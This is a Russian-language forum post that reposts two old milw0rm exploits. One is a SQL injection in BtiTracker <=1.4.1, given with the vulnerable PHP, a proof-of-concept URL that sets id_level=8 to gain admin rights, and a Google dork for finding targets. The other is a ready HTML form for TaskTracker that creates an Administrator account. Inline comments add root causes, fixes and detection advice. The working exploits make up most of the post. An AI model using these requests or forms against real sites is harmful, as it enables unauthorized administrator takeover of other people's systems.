Старый 11.05.2008, 14:23
z01b

BtiTracker <=v1.4.1

Код:
#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#									
# Discovered by: m@ge|ozz - babbano@gmail.com					
# Vulnerability: Remote SQL Injection /
# Problem: Any user can be Administrator					
# Website Vendor: http://www.btiteam.org					
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
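#
# Root cause: the request values are placed into the SET clause unquoted and
# unvalidated ($style/$langue presumably mirror $_GET; the assignment is not
# shown here), so text after the number is parsed as further column assignments.
# Fix: cast both values to integers (e.g. intval()) or bind them as query
# parameters, and do not suppress query errors with @.
#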
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control: account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################

# milw0rm.com [2007-05-22]
TaskTracker all versions

Код:
<!--

*******************************************************************************
# Title   :  TaskTracker All Version Remote Add Admin Exploit
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.geckovich.com
# $$      :  $39.99 - $19.99

*******************************************************************************

-->

<!--
  NOTE(review): this form POSTs a new account (Name, Email, UserName, Password)
  together with a caller-chosen GroupID to Customize.asp?a=Add; per the options
  below, GroupID 3 is Administrator. The advisory title implies the endpoint
  accepts the request without an authenticated administrator session. The
  server-side code is not shown here, so confirm against the application.
  Mitigation: enforce an authenticated, authorized admin session on every
  Customize.asp action and require a per-session anti-CSRF token on
  state-changing requests.
  Detection: look for POSTs to Customize.asp?a=Add from clients with no prior
  login, and audit the account list for unexpected GroupID 3 entries.
-->
<FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
	<td valign=top class='data3'>
       	<input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">

	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<!-- The privilege level is taken from this client-supplied field. -->
		<select name="GroupID" class="selectedtextboxes">
			<option value="1">Publisher</option>
			<option value="2">Editor</option>

			<option value="3">Administrator</option>
		</select>
	</td>
	<td valign=middle class='data3' align="center" colspan="2" align="center">
    	<input type="submit" value="Gonder">
    	</form>

# milw0rm.com [2007-01-01]